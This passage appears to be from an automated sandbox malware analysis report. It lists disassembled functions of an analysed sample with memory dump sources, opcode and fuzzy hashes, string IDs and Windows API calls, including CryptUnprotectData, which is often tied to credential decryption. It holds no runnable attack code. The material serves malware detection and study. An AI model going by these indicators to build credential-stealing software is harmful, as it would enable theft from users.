                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: G1F$Mz]$sVx$sVx
                            • API String ID: 0-3723585175
                            • Opcode ID: e141ba6a6a63ceba6f903dfadce0f3f24b91bac4ee0c02c74418fe14bb7e84db
                            • Instruction ID: 895d7be871fb69dc2c7f294f8a24134cfe119da2be028b05c192178388064528
                            • Opcode Fuzzy Hash: e141ba6a6a63ceba6f903dfadce0f3f24b91bac4ee0c02c74418fe14bb7e84db
                            • Instruction Fuzzy Hash: 8342F7F3A0C2049FE704AE2DEC8577ABBE9EF94320F1A463DE6C4C7744E53558058696
                            Function 00933A84 Relevance: 4.6, Strings: 3, Instructions: 879COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: cqb$fuo$fuo
                            • API String ID: 0-2515738117
                            • Opcode ID: f1f749dd967cfd6715147d2ae065e26b7436d205c2724c5059c15b1a401bc473
                            • Instruction ID: c2b0d8f34535405a8e9f955d0cbd567f09ba06e4c2fc113e87e2fa78fb4dfe77
                            • Opcode Fuzzy Hash: f1f749dd967cfd6715147d2ae065e26b7436d205c2724c5059c15b1a401bc473
                            • Instruction Fuzzy Hash: 9B52F5F3A0C204AFD7046E29EC8576AFBE5EF94720F1A492DE6C4C7744EA3598018797
                            Function 00573720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.COMBASE(0057E118,00000000,00000001,0057E108,00000000), ref: 00573758
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 005737B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: df16e93cc28027fa94a1b991294918dd137a4b7f47576913475784fb60bb6e9d
                            • Instruction ID: 7b80e93c1e69baa9de096536d71b97b0d2170c9c703f062fbf38ff4138a9bc8d
                            • Opcode Fuzzy Hash: df16e93cc28027fa94a1b991294918dd137a4b7f47576913475784fb60bb6e9d
                            • Instruction Fuzzy Hash: 06410C70A40A289FDB24DB54DC99F9BB7B4BB48702F4081D8E608E72D0E7716E85CF51
                            Function 00569B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00569B84
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00569BA3
                            • LocalFree.KERNEL32(?), ref: 00569BD3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 4b840e52e20ad8ab18d84aa835dff6bc376e3832d61bbb175d1a9f925182db98
                            • Instruction ID: 49265fa9d1993f173521eba87384ff84da47d5f2f4914e39f8d7521a2f69e354
                            • Opcode Fuzzy Hash: 4b840e52e20ad8ab18d84aa835dff6bc376e3832d61bbb175d1a9f925182db98
                            • Instruction Fuzzy Hash: 6011B7B8A00209EFDB04DF94D985AAEB7B9FF89300F108598E915A7350D774AE14CFA1
                            Function 0093F4E1 Relevance: 2.3, Strings: 1, Instructions: 1092COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Y~w
                            • API String ID: 0-938452142
                            • Opcode ID: 539ff8d87049db22bb888b2faa78eb3f9349d753dc7695bb27ada7fb4019c9ef
                            • Instruction ID: 4fdfd1b4621c599c2a053b4dd55a503ea40b70c4c820edd53cf5423fcd90286b
                            • Opcode Fuzzy Hash: 539ff8d87049db22bb888b2faa78eb3f9349d753dc7695bb27ada7fb4019c9ef
                            • Instruction Fuzzy Hash: 7872D4F360C200AFE3046E29EC8567AFBE9EFD4720F16853DE6C4C7744E63598458696
                            Function 00937044 Relevance: 2.1, Strings: 1, Instructions: 853COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: q'/{
                            • API String ID: 0-437180505
                            • Opcode ID: f353bcbe6914c3db8daa022174e9a0ea4f2dd2892945c73c8d2fe273243a02bf
                            • Instruction ID: 0794353164a9851997a342d297f661982abaa2f6c2d0f2281d4daeb5293ba960
                            • Opcode Fuzzy Hash: f353bcbe6914c3db8daa022174e9a0ea4f2dd2892945c73c8d2fe273243a02bf
                            • Instruction Fuzzy Hash: 1D4268F360C2049FE708AE28EC8577ABBD6EF94720F1A453DE6C5C7744E93598058687
                            Function 00832FB7 Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %t__
                            • API String ID: 0-598166882
                            • Opcode ID: b9a4e7e119a92880d6691b3a4610e1ee561bdebb9a3740d80efc4cd1eca41414
                            • Instruction ID: d81c3d54c6db7708698420c71f5791ea26b2c83ab0eef811b683713e01f7ac3c
                            • Opcode Fuzzy Hash: b9a4e7e119a92880d6691b3a4610e1ee561bdebb9a3740d80efc4cd1eca41414
                            • Instruction Fuzzy Hash: 5A81C2B3E186104BF3005E39DD8836AB6D6EBD4320F2B463DDACC97784D97A98058786
                            Function 0089F3B2 Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 1'k
                            • API String ID: 0-240354404
                            • Opcode ID: befc6766fa986b96f627b4ae432477f3b4146e15e91d78a6ffdf810f5d1ae260
                            • Instruction ID: 27f0e0d3603851e7d2a3a630129f7928032264d598298e75c0f1c64ee62159d7
                            • Opcode Fuzzy Hash: befc6766fa986b96f627b4ae432477f3b4146e15e91d78a6ffdf810f5d1ae260
                            • Instruction Fuzzy Hash: AA418FF3A083189FF3446E28ECD077AB3D9EB94310F1A463DEA8583741F93659058281
                            Function 00813A0E Relevance: .2, Instructions: 248COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a40ca6b5967beee06ae24aa603f1c1d02c6f00a2cabb1eb9f45a262d9faaf550
                            • Instruction ID: ea56c4790629dff039654c3dac5733b4d52bb747b9ea8ae3dc4e8e8fe9d8e60a
                            • Opcode Fuzzy Hash: a40ca6b5967beee06ae24aa603f1c1d02c6f00a2cabb1eb9f45a262d9faaf550
                            • Instruction Fuzzy Hash: 8E715BF3E183145FE3146E7DDD98726BBDADBD4360F1A463DE588C7388E9B949014282
                            Function 008DF79E Relevance: .2, Instructions: 240COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7e7e58a6596d515967bc6777e794d4177024c5014818b604e25e28b13270af76
                            • Instruction ID: 47da05140efb0251a112725e722633cfe81f2807d30f79d252c083c3975f3f21
                            • Opcode Fuzzy Hash: 7e7e58a6596d515967bc6777e794d4177024c5014818b604e25e28b13270af76
                            • Instruction Fuzzy Hash: ED710BF3A092049FE304AE2DDC4476AF7EAEBD4721F1A853DD6C483348E97558058697
                            Function 008B4688 Relevance: .2, Instructions: 234COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 556f9a77e7dd00025854aae95ccad3bafe115b71c3f44942c8d02715d85d01bc
                            • Instruction ID: 02cdc0b508bb9537429d8c6ddb9d346572850df00a9c5092d75939296d49c053
                            • Opcode Fuzzy Hash: 556f9a77e7dd00025854aae95ccad3bafe115b71c3f44942c8d02715d85d01bc
                            • Instruction Fuzzy Hash: 7A7106F3E182104BE3086A2DDC5977ABAD6DBD4720F1B463DDF8997784E9395C028286
                            Function 00903F2E Relevance: .2, Instructions: 173COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f8a98cea055a4774200730dccc767b7fbced180d2f84d016db01ecec484bf665
                            • Instruction ID: e6b858b47d265ba67a2c4a85af9eb413f07fe60fb03affff95b18c67e9e69951
                            • Opcode Fuzzy Hash: f8a98cea055a4774200730dccc767b7fbced180d2f84d016db01ecec484bf665
                            • Instruction Fuzzy Hash: 625127F3A082045FF354AA6DEC8173BB7D9EB94320F19853DEE94C3784E93D98044296
                            Function 00803085 Relevance: .1, Instructions: 137COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
